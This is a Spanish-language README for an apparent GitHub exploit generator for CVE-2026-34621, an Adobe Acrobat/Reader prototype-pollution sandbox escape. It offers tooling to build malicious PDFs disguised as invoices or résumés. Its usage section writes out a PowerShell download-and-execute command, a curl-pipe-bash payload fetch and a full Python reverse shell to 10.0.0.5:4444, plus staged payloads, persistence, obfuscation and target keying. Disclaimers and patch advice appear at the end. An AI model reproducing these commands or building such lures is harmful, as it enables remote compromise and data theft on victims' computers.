
Un generador de exploits sofisticado y multiplataforma para **CVE-2026-34621** – una vulnerabilidad crítica de contaminación de prototipos en Adobe Acrobat y Reader que conduce a la evasión del sandbox y a la ejecución arbitraria de código en Windows y macOS.
Un generador de exploits sofisticado y multiplataforma para CVE-2026-34621 – una vulnerabilidad crítica de contaminación de prototipos en Adobe Acrobat y Reader que permite el escape del sandbox y la ejecución arbitraria de código en Windows y macOS.
⚠️ AVISO IMPORTANTE
Esta herramienta está destinada únicamente a investigación de seguridad autorizada y pruebas de penetración.
El uso no autorizado contra sistemas que no posees o para los que no tienes permiso escrito explícito para probar es ilegal. El autor no asume ninguna responsabilidad por el mal uso.
CVE-2026-34621 es una vulnerabilidad de día cero en Adobe Acrobat y Reader que permite a un atacante:
Este generador crea un archivo PDF malicioso que, al abrirse en una versión vulnerable de Adobe Reader, ejecuta automáticamente un payload adaptado al sistema operativo de la víctima.
Plataformas Destino Soportadas:
| Categoría | Capacidades |
|---|---|
| Payloads Multiplataforma | Detecta automáticamente el SO y selecciona el método de ejecución de comandos apropiado para Windows o macOS. |
| Múltiples Vectores de Ejecución | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS). |
| Payloads por Etapas | Descarga y ejecuta payloads de segunda etapa desde una URL remota. |
| Persistencia | Instala clave Run del registro (Windows) o LaunchAgent (macOS). |
| Técnicas de Evasión | Tres niveles de ofuscación de JavaScript, clave de entorno, retrasos de ejecución, código polimórfico. |
| Incrustación de PDF Señuelo | Fusiona el exploit en un PDF de apariencia legítima (requiere PyPDF2). |
| Múltiples Disparadores | OpenAction, acción de apertura de página o JavaScript a nivel de documento. |
| Informes Completos | Informes HTML, TXT y JSON que detallan la configuración del payload. |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
El script principal utiliza únicamente la biblioteca estándar de Python. Para la función de fusión de PDF señuelo, instala PyPDF2:
pip install PyPDF2
Genera un PDF básico que abre la calculadora tanto en Windows como en macOS:
python3 cve_2026_34621_advanced.py -o test.pdf
Esto crea:
test.pdf – El archivo PDF malicioso.
test_report.html – Informe HTML detallado.
test_report.txt – Resumen en texto plano.
test_config.json – Exportación de configuración JSON.
Comandos para Windows
1-Escenario Comando
A-Ventana emergente básica de calc.exe
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
Reverse shell con PowerShell
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
Payload por etapas con persistencia
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
Clave de entorno (solo se ejecuta en "SALES-PC")
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
Con nivel de ofuscación 2 y retraso de 10 segundos
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
Comandos para macOS
2-Escenario Comando
Abrir Calculadora
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
Descargar y ejecutar script
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Reverse shell mediante Python
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
Persistencia mediante LaunchAgent
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
Incrustación en un PDF Señuelo
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-Nota sobre Pruebas en Móviles
El script en sí se ejecuta en escritorio (Windows/macOS/Linux) para generar el PDF. El PDF generado se puede abrir en dispositivos Android o iOS, pero:
Las versiones móviles de Adobe Acrobat Reader no son vulnerables a CVE-2026-34621.
El payload activará un respaldo de demostración benigno (abre una URL o muestra una alerta) en lugar de ejecutar comandos del sistema.
Opción Descripción
-o, --output ARCHIVO Obligatorio. Nombre del archivo PDF de salida.
--win CMD Comando de Windows a ejecutar (por defecto: calc.exe).
--mac CMD Comando de macOS a ejecutar (por defecto: open /System/Applications/Calculator.app).
--stage URL URL para descargar el payload de segunda etapa.
-p, --persistence Instala mecanismo de persistencia (Registro/LaunchAgent).
-O, --obfuscate NIVEL Nivel de ofuscación de JavaScript (0=ninguno, 1=básico, 2=intermedio, 3=avanzado).
-d, --delay SEGUNDOS Retrasa la ejecución los segundos especificados.
-k, --key NOMBRE_HOST Clave de entorno – solo se ejecuta en el nombre de host coincidente.
-l, --lure PDF Ruta a un PDF legítimo para usar como señuelo (fusiona el exploit).
--trigger TIPO Vector de disparo: openaction, pageopen o doclevel.
--no-reports Omite la generación de informes HTML/TXT/JSON.
--seed N Establece la semilla aleatoria para la generación polimórfica reproducible.
Cadena de Ataque
Contaminación de Prototipos:
El JavaScript incrustado modifica Object.prototype para inyectar propiedades maliciosas (__trusted, privileged, etc.). Esto confunde el límite de confianza del motor JavaScript de Adobe.
Escalada de Contexto
Debido al prototipo contaminado, el motor trata incorrectamente el JavaScript de documentos no confiables como si se ejecutara en un contexto privilegiado.
Acceso a APIs Privilegiadas
El script ahora puede llamar a APIs restringidas como app.launchURL, util.readFileIntoStream y app.trustedFunction.
Escape del Sandbox
Estas APIs permiten el acceso al sistema de archivos y la ejecución de procesos fuera del sandbox de Adobe.
Ejecución Arbitraria de Código
El script ejecuta el comando del atacante utilizando métodos específicos del SO:
Windows: cmd.exe /c, PowerShell o WScript.Shell.
macOS: Manejador de URL de Terminal.app u osascript.
Niveles de Ofuscación
Nivel Descripción
0 Sin ofuscación – JavaScript legible y plano.
1 Literales de cadena convertidos a String.fromCharCode, nombres de variables aleatorizados.
2 Nivel 1 + inyección de código muerto y comentarios basura.
3 Script completo codificado en base64 y envuelto en eval(atob(...)), luego re-ofuscado.
Producto Track Versiones Vulnerables Versión Parcheada
Adobe Acrobat DC Continuo ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC Continuo ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 Clásico ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)
Actualizar Inmediatamente: Aplica las últimas actualizaciones de seguridad de Adobe.
Deshabilitar JavaScript en Adobe Reader: Edición → Preferencias → JavaScript → desmarca "Habilitar JavaScript de Acrobat" (nota: esto rompe algunas funciones del PDF).
Usar Visores de PDF Alternativos: Considera usar navegadores o visores de terceros que no estén afectados.
Las contribuciones son bienvenidas, pero ten en cuenta:
Todas las solicitudes de extracción deben ser para investigación defensiva, mejoras de detección o mejoras de informes.
No aceptamos contribuciones que aumenten la capacidad ofensiva de la herramienta más allá de lo necesario para pruebas legítimas.
Para contribuir:
Haz un fork del repositorio.
Crea una rama de características.
Envía una solicitud de extracción con una descripción clara de los cambios.
Este proyecto se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas.
Al usar este software, aceptas que eres responsable de cumplir con todas las leyes y regulaciones aplicables.
El autor renuncia a toda responsabilidad por cualquier mal uso o daño causado por esta herramienta.